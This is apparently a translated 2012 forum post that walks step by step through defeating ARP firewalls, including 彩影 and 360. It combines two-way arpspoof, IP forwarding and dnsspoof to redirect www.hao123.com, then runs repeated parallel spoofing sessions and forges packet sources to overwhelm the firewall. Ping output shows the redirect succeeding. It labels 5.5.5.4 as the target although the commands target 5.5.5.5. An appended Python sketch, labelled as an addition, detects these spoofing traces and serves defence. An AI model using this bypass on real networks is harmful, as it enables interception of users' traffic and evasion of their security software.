DNS SPOOF: a simple bypass of ARP firewalls
Posted on 2012-11-8 01:46:49
TEST: Google for "彩影ARP防火墙单机版下载" (download of the 彩影 ARP Firewall, standalone edition)
RE:
http://www.3g-sec.com/thread-305-1-1.html

Testing DNS spoofing
Gateway: 5.5.5.2
Target: 5.5.5.4

Terminal 1

    root@Dis9Team:~# arpspoof 5.5.5.2 -t 5.5.5.5

Terminal 2

    root@Dis9Team:~# arpspoof 5.5.5.5 -t 5.5.5.2

Enable forwarding

    root@Dis9Team:~# echo 1 > /proc/sys/net/ipv4/ip_forward

The ARP firewall shows some activity.

Ignore that for now and try spoofing DNS first.


    root@Dis9Team:~# cat baidu
    5.5.5.4 www.hao123.com
    root@Dis9Team:~# dnsspoof -f baidu host 5.5.5.5 and udp  port 53

5.5.5.4 is this machine, serving the default Apache page.

Ping from Windows:

    C:\Documents and Settings\Administrator>ping www.hao123.com

    Pinging hao123.n.shifen.com [61.135.185.29] with 32 bytes of data:

    Reply from 61.135.185.29: bytes=32 time=210ms TTL=128

The spoof did not succeed.
Let's keep sending packets nonstop..

    root@Dis9Team:~# cat send
    arpspoof 5.5.5.5 -t 5.5.5.2
    arpspoof 5.5.5.2 -t 5.5.5.5
    root@Dis9Team:~# screen ./send

    [1]+  Stopped                 screen ./send
    root@Dis9Team:~# screen ./send

    [2]+  Stopped                 screen ./send
    root@Dis9Team:~# screen ./send

    [3]+  Stopped                 screen ./send
    root@Dis9Team:~# screen ./send

    [4]+  Stopped                 screen ./send

And so on.

Check the processes


    root@Dis9Team:~# screen -ls
    There are screens on:
            3754.pts-7.Dis9Team        (11/01/2012 12:21:47 AM)        (Detached)
            3750.pts-7.Dis9Team        (11/01/2012 12:21:46 AM)        (Detached)
            3746.pts-7.Dis9Team        (11/01/2012 12:21:44 AM)        (Detached)
            3742.pts-7.Dis9Team        (11/01/2012 12:21:41 AM)        (Detached)
            3722.pts-4.Dis9Team        (11/01/2012 12:21:21 AM)        (Attached)
            3713.pts-4.Dis9Team        (11/01/2012 12:21:08 AM)        (Detached)
    6 Sockets in /var/run/screen/S-root.

    root@Dis9Team:~#

PING test


    C:\Documents and Settings\Administrator>ping www.hao123.com

    Pinging www.hao123.com [5.5.5.4] with 32 bytes of data:

    Reply from 5.5.5.4: bytes=32 time<1ms TTL=64
    Reply from 5.5.5.4: bytes=32 time<1ms TTL=64

    Ping statistics for 5.5.5.4:
        Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),
    Approximate round trip times in milli-seconds:
        Minimum = 0ms, Maximum = 0ms, Average = 0ms
    Control-C
    ^C
    C:\Documents and Settings\Administrator>

For 360
For 360, forging the source of the packets is enough;
otherwise it will block the sending IP.






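Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a fine blade.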
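
Seen from the monitoring side, the parallel arpspoof runs in the post leave three traces in an ARP capture: one IP answered by more than one MAC, one MAC answering for more than one IP, and a burst of replies from a single MAC. The Python sketch below checks for all three; it is an added example, not part of the original post, and the capture line format (modelled on `tcpdump -tt -e -n arp`), the MAC addresses and the thresholds are constructed assumptions.

```python
import re
from collections import defaultdict

GW, HOST, SPOOFER = "00:0c:29:aa:aa:aa", "00:0c:29:bb:bb:bb", "00:0c:29:cc:cc:cc"

def _line(ts, src, dst, ip):
    # One constructed capture line, styled after `tcpdump -tt -e -n arp` (assumed format).
    return (f"{ts:.2f} {src} > {dst}, ethertype ARP (0x0806), length 60: "
            f"Reply {ip} is-at {src}, length 46")

# Constructed sample: two legitimate replies, then one MAC claiming both the
# gateway (5.5.5.2) and the host (5.5.5.5) several times per second.
SAMPLE = "\n".join(
    [_line(100.0, GW, HOST, "5.5.5.2"), _line(100.5, HOST, GW, "5.5.5.5")]
    + [_line(101.0 + 0.2 * i, SPOOFER, HOST, "5.5.5.2") for i in range(4)]
    + [_line(101.1 + 0.2 * i, SPOOFER, GW, "5.5.5.5") for i in range(2)]
)

REPLY = re.compile(r"^(\d+\.\d+) .*Reply (\S+) is-at ([0-9a-f:]{17})", re.M)

def analyze(capture, window=5.0, max_replies=3):
    """Return the three ARP-spoofing indicators found in the capture text."""
    macs_for_ip, ips_for_mac, times = defaultdict(set), defaultdict(set), defaultdict(list)
    for ts, ip, mac in REPLY.findall(capture):
        macs_for_ip[ip].add(mac)
        ips_for_mac[mac].add(ip)
        times[mac].append(float(ts))

    def floods(stamps):
        # True when more than max_replies replies fall inside one window.
        stamps = sorted(stamps)
        return any(stamps[i + max_replies] - stamps[i] <= window
                   for i in range(len(stamps) - max_replies))

    return {
        "conflicting_ips": sorted(ip for ip, m in macs_for_ip.items() if len(m) > 1),
        "multi_ip_macs": sorted(mac for mac, i in ips_for_mac.items() if len(i) > 1),
        "flooding_macs": sorted(mac for mac, t in times.items() if floods(t)),
    }

if __name__ == "__main__":
    for name, values in analyze(SAMPLE).items():
        print(f"{name}: {values}")
```

A single MAC that appears under both `multi_ip_macs` and `flooding_macs` is the strongest signal here, since a legitimate host normally answers for its own address only and does so rarely.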
